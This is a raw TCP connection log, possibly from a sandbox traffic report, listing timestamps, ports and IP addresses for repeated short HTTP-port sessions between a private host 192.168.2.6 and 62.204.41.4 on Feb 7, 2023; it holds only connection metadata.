Feb 7, 2023 20:03:15.278099060 CET	50231	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.278841972 CET	50232	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.339380026 CET	80	50231	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.339430094 CET	80	50232	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.339488029 CET	50231	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.339559078 CET	50232	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.344050884 CET	50232	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.405179024 CET	80	50232	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.407577991 CET	80	50232	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.407702923 CET	50232	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.513501883 CET	50232	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.514377117 CET	50233	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.575059891 CET	80	50232	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.575252056 CET	50232	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.576828957 CET	80	50233	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.577063084 CET	50233	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.578131914 CET	50233	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.640671015 CET	80	50233	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.644202948 CET	80	50233	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.645406961 CET	50233	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.762865067 CET	50233	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.763667107 CET	50234	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.825282097 CET	80	50234	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.825344086 CET	80	50233	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.825505972 CET	50234	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.825527906 CET	50233	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.828144073 CET	50234	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.889554024 CET	80	50234	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.892023087 CET	80	50234	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.892184973 CET	50234	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.002418995 CET	50234	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.003601074 CET	50235	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.063939095 CET	80	50234	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.064038992 CET	50234	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.065078974 CET	80	50235	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.065618992 CET	50235	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.065618992 CET	50235	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.127185106 CET	80	50235	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.132009029 CET	80	50235	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.132128000 CET	50235	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.260565042 CET	50236	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.260647058 CET	50235	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.322825909 CET	80	50235	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.323167086 CET	50235	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.323623896 CET	80	50236	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.323959112 CET	50236	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.324345112 CET	50236	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.386845112 CET	80	50236	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.389148951 CET	80	50236	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.390044928 CET	50236	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.498814106 CET	50236	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.500463963 CET	50237	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.561464071 CET	80	50236	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.562647104 CET	80	50237	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.562832117 CET	50236	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.562892914 CET	50237	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.563327074 CET	50237	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.625720978 CET	80	50237	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.627619982 CET	80	50237	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.630831957 CET	50237	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.748223066 CET	50237	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.749186039 CET	50238	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.810569048 CET	80	50237	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.810725927 CET	50237	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.811218977 CET	80	50238	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.811459064 CET	50238	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.812391996 CET	50238	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.874182940 CET	80	50238	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.876820087 CET	80	50238	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:16.882879972 CET	50238	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.989542007 CET	50238	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:16.989624023 CET	50239	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.050405025 CET	80	50239	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.050771952 CET	50239	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.051311016 CET	50239	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.051398039 CET	80	50238	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.051520109 CET	50238	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.111928940 CET	80	50239	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.116439104 CET	80	50239	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.118140936 CET	50239	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.232645035 CET	50239	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.233719110 CET	50240	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.293391943 CET	80	50239	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.293584108 CET	50239	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.295073986 CET	80	50240	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.295238018 CET	50240	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.295969963 CET	50240	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.357280970 CET	80	50240	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.359875917 CET	80	50240	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.360045910 CET	50240	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.468915939 CET	50240	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.473412037 CET	50241	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.530570984 CET	80	50240	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.530699015 CET	50240	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.534648895 CET	80	50241	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.534820080 CET	50241	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.535341024 CET	50241	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.596528053 CET	80	50241	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.598932981 CET	80	50241	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.599044085 CET	50241	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.700726032 CET	50241	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.701539993 CET	50242	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.762017965 CET	80	50242	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.762054920 CET	80	50241	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.762276888 CET	50241	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.762294054 CET	50242	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.764358997 CET	50242	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.824923992 CET	80	50242	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.827296972 CET	80	50242	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.827466965 CET	50242	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.935622931 CET	50242	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.936590910 CET	50243	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.996504068 CET	80	50242	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.996681929 CET	50242	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.999020100 CET	80	50243	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:17.999526024 CET	50243	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:17.999929905 CET	50243	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.062412024 CET	80	50243	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.065951109 CET	80	50243	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.066170931 CET	50243	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.171458960 CET	50243	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.172236919 CET	50244	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.232764006 CET	80	50244	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.232948065 CET	50244	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.233908892 CET	80	50243	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.234015942 CET	50243	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.251405001 CET	50244	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.312041998 CET	80	50244	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.314459085 CET	80	50244	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.314949036 CET	50244	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.420353889 CET	50244	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.421705008 CET	50245	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.480963945 CET	80	50244	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.481148958 CET	50244	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.483192921 CET	80	50245	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.483382940 CET	50245	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.483828068 CET	50245	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.545236111 CET	80	50245	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.548212051 CET	80	50245	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.548408031 CET	50245	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.657334089 CET	50245	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.658564091 CET	50246	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.719891071 CET	80	50245	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.720051050 CET	50245	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.720303059 CET	80	50246	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.721407890 CET	50246	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.721407890 CET	50246	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.783056021 CET	80	50246	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.785443068 CET	80	50246	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.786398888 CET	50246	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.917481899 CET	50247	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.917532921 CET	50246	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.979144096 CET	80	50247	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.979176998 CET	80	50246	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:18.979312897 CET	50247	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.979917049 CET	50247	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:18.979980946 CET	50246	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.041315079 CET	80	50247	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.043632984 CET	80	50247	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.043797016 CET	50247	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.154772997 CET	50247	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.161798954 CET	50248	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.216232061 CET	80	50247	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.216407061 CET	50247	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.222291946 CET	80	50248	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.222449064 CET	50248	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.236085892 CET	50248	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.296571970 CET	80	50248	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.300606012 CET	80	50248	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.300789118 CET	50248	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.422177076 CET	50248	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.423388004 CET	50249	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.482724905 CET	80	50248	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.482867956 CET	50248	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.484899998 CET	80	50249	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.485127926 CET	50249	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.487023115 CET	50249	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.549319983 CET	80	50249	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.551383018 CET	80	50249	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.551609993 CET	50249	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.689904928 CET	50249	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.691056013 CET	50250	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.751756907 CET	80	50249	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.751993895 CET	50249	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.753762007 CET	80	50250	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.753936052 CET	50250	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.754499912 CET	50250	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.817192078 CET	80	50250	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.820547104 CET	80	50250	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:19.820667982 CET	50250	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.943315029 CET	50250	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:19.944390059 CET	50251	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.006110907 CET	80	50250	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.006263971 CET	50250	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.006623030 CET	80	50251	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.006751060 CET	50251	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.007203102 CET	50251	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.069371939 CET	80	50251	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.073108912 CET	80	50251	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.073193073 CET	50251	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.186244965 CET	50251	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.187061071 CET	50252	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.247559071 CET	80	50252	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.247698069 CET	50252	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.248559952 CET	80	50251	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.248701096 CET	50251	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.248979092 CET	50252	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.309524059 CET	80	50252	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.311841965 CET	80	50252	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.311975956 CET	50252	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.450428009 CET	50252	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.451488972 CET	50253	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.511121035 CET	80	50252	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.511337042 CET	50252	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.512697935 CET	80	50253	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.512829065 CET	50253	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.519824982 CET	50253	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.581166983 CET	80	50253	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.583318949 CET	80	50253	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.583422899 CET	50253	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.686898947 CET	50253	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.688206911 CET	50254	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.748400927 CET	80	50253	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.748496056 CET	50253	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.749619961 CET	80	50254	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.749716997 CET	50254	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.750307083 CET	50254	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.811750889 CET	80	50254	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.814074993 CET	80	50254	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.814219952 CET	50254	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.920433044 CET	50254	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.921484947 CET	50255	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.982249022 CET	80	50254	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.982481003 CET	50254	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.982826948 CET	80	50255	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:20.982991934 CET	50255	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:20.983532906 CET	50255	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.045059919 CET	80	50255	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.049305916 CET	80	50255	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.049546957 CET	50255	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.155206919 CET	50255	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.156316042 CET	50256	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.216907024 CET	80	50255	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.217103004 CET	50255	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.218521118 CET	80	50256	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.218719006 CET	50256	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.219152927 CET	50256	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.280504942 CET	80	50256	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.283005953 CET	80	50256	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.283195972 CET	50256	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.393191099 CET	50256	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.398225069 CET	50257	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.454777002 CET	80	50256	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.454883099 CET	50256	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.460561991 CET	80	50257	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.460743904 CET	50257	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.461330891 CET	50257	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.523611069 CET	80	50257	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.526721954 CET	80	50257	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.526930094 CET	50257	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.793298960 CET	50257	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.844455004 CET	50258	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.855731964 CET	80	50257	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.855942965 CET	50257	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.906481028 CET	80	50258	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:21.906789064 CET	50258	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:21.947679043 CET	50258	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.009231091 CET	80	50258	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.011472940 CET	80	50258	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.011641026 CET	50258	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.158493042 CET	50258	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.159322023 CET	50259	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.219786882 CET	80	50259	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.219888926 CET	80	50258	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.220046997 CET	50259	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.220128059 CET	50258	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.267663002 CET	50259	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.328531981 CET	80	50259	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.332771063 CET	80	50259	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.332978010 CET	50259	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.496253014 CET	50259	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.497457981 CET	50260	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.556886911 CET	80	50259	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.557121992 CET	50259	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.559757948 CET	80	50260	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.559941053 CET	50260	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.605984926 CET	50260	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:22.668237925 CET	80	50260	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.670617104 CET	80	50260	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:22.670813084 CET	50260	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.430162907 CET	50260	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.430968046 CET	50261	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.493421078 CET	80	50260	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.493468046 CET	80	50261	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.493609905 CET	50260	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.493690014 CET	50261	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.514341116 CET	50261	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.576347113 CET	80	50261	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.579701900 CET	80	50261	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.579873085 CET	50261	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.743767023 CET	50261	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.744524002 CET	50262	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.805027008 CET	80	50262	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.805238008 CET	50262	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.805310965 CET	80	50261	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.805382013 CET	50261	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.849061012 CET	50262	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:23.909953117 CET	80	50262	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.912177086 CET	80	50262	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:23.912347078 CET	50262	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:24.118141890 CET	50262	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:24.118917942 CET	50263	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:24.178714037 CET	80	50262	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:24.178904057 CET	50262	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:24.179316044 CET	80	50263	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:24.179436922 CET	50263	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.380079985 CET	50263	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.442532063 CET	80	50263	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.446877956 CET	80	50263	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.447114944 CET	50263	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.601485968 CET	50263	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.602415085 CET	50264	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.663410902 CET	80	50263	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.663602114 CET	50263	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.664725065 CET	80	50264	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.664901972 CET	50264	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.691638947 CET	50264	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.754035950 CET	80	50264	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.756413937 CET	80	50264	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.756510019 CET	50264	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.878047943 CET	50264	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.878851891 CET	50265	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.940385103 CET	80	50265	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.940501928 CET	80	50264	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:25.940505981 CET	50265	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.940563917 CET	50264	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:25.941004038 CET	50265	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.002546072 CET	80	50265	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.004627943 CET	80	50265	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.004836082 CET	50265	80	192.168.2.6	62.204.41.4
